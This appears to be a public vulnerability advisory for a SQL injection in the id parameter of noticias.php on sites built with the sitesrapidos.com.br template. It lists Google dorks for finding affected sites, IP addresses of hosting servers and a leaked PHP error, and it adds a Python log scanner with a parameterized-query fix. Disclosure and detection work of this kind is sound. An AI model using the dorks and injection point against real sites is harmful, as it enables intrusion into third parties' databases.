
Criação sitesrapidos.com.br Web Design Brazil SQL Injection

Author: KingSkrupellos , Published: 18-01-2019
##############################################################

# Exploit Title : Criação sitesrapidos.com.br Web Design Brazil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/01/2019
# Vendor Homepage : sitesrapidos.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''criação: sitesrapidos.com.br''
criação: sitesrapidos.com.br inurl:/noticias.php?id=
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

##############################################################

# SQL Injection Exploit :
***********************
/noticias.php?id=[SQL Injection]

##############################################################

# Example Vulnerable Sites :
*************************


Note : (63.247.92.74) => There are 31 domains hosted on this server.

Note : (192.185.170.138) => There are 159 domains hosted on this server.

Note : (187.45.193.229) => There are 549 domains hosted on this server.

Note : (187.45.210.66) => There are 95 domains hosted on this server.

Note : (192.185.170.14) => There are 60 domains hosted on this server.

Note : (192.185.31.71) => There are 194 domains hosted on this server.

##############################################################

# SQL Database Error :
**********************

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/httpd/vhosts/sanderagropecuaria.com.br/httpdocs/noticias.php on line 42
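
For site owners running this template: an added detection example (not part of the original advisory or the vendor's code) that flags requests to noticias.php whose id parameter is not purely numeric after URL decoding, and recognises the PHP warning quoted above in an error log. The log lines, IP addresses and function names are constructed for illustration, and the Combined Log Format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Combined Log Format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jan/2019:10:00:00 -0300] "GET /noticias.php?id=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [16/Jan/2019:10:00:05 -0300] "GET /noticias.php?id=3%27 HTTP/1.1" 200 312',
    '203.0.113.9 - - [16/Jan/2019:10:00:09 -0300] "GET /noticias.php?id=3%2527 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [16/Jan/2019:10:01:00 -0300] "GET /contato.php?id=abc HTTP/1.1" 200 800',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# The warning quoted in the advisory: the query failed and the script passed
# the failed result straight to mysql_fetch_array().
PHP_WARNING_RE = re.compile(
    r"mysql_fetch_array\(\): supplied argument is not a valid MySQL result resource"
    r" in (?P<script>\S+) on line (?P<line>\d+)")

def suspicious_id(target):
    """Return the decoded id value if a noticias.php request carries a
    non-numeric id, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/noticias.php"):
        return None
    # keep_blank_values=True so an empty "id=" is reported as well.
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None

def scan_access_log(lines):
    """Return (client_ip, decoded_id) for every flagged request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            value = suspicious_id(m.group("target"))
            if value is not None:
                hits.append((line.split(" ", 1)[0], value))
    return hits

def failed_query_site(error_line):
    """Return (script_path, line_number) if the line is the quoted PHP warning."""
    m = PHP_WARNING_RE.search(error_line)
    return (m.group("script"), int(m.group("line"))) if m else None

if __name__ == "__main__":
    for ip, value in scan_access_log(SAMPLE_LOG):
        print(f"{ip} sent non-numeric id {value!r}")
```

A hit from either function means the id value reaches the SQL query unvalidated; the fix is on the PHP side: cast or validate id as an integer and use a parameterized query.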

##############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##############################################################
